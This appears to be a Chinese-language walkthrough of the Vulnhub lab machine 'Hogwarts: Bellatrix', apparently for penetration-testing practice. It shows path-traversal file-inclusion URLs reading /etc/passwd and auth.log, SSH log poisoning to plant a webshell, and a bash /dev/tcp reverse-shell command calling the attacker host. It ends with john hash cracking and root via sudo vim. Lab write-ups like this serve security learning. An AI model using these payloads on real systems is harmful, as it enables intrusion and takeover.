Vulnhub: Hogwarts: Bellatrix靶机

kali:192.168.111.111

靶机:192.168.111.228

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.228

在这里插入图片描述

访问80端口

Vulnhub: Hogwarts: Bellatrix靶机_第1张图片

查看源码,提示ikilledsiriusblack.php和文件包含的参数名file

Vulnhub: Hogwarts: Bellatrix靶机_第2张图片

漏洞利用

ikilledsiriusblack.php存在文件包含

http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../etc/passwd

Vulnhub: Hogwarts: Bellatrix靶机_第3张图片

可以包含ssh日志文件/var/log/auth.log

http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log

Vulnhub: Hogwarts: Bellatrix靶机_第4张图片

写入webshell到ssh日志文件

ssh ''@192.168.111.228

Vulnhub: Hogwarts: Bellatrix靶机_第5张图片

执行命令

http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log&cmd=id

Vulnhub: Hogwarts: Bellatrix靶机_第6张图片

执行反弹shell

bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

Vulnhub: Hogwarts: Bellatrix靶机_第7张图片

提权

/var/www/html/c2VjcmV0cw==目录中发现密码字典和lestrange的密码密文

Vulnhub: Hogwarts: Bellatrix靶机_第8张图片

在这里插入图片描述

利用john爆破密文,密码:ihateharrypotter

john hash --wordlist=./pass.txt

Vulnhub: Hogwarts: Bellatrix靶机_第9张图片

lestrange用户sudo权限

Vulnhub: Hogwarts: Bellatrix靶机_第10张图片

提权方法:https://gtfobins.github.io/gtfobins/vim/#sudo

Vulnhub: Hogwarts: Bellatrix靶机_第11张图片

提升为root

sudo -u root vim -c ':!/bin/bash'

Vulnhub: Hogwarts: Bellatrix靶机_第12张图片

flag

Vulnhub: Hogwarts: Bellatrix靶机_第13张图片

你可能感兴趣的:(web安全,网络安全,安全)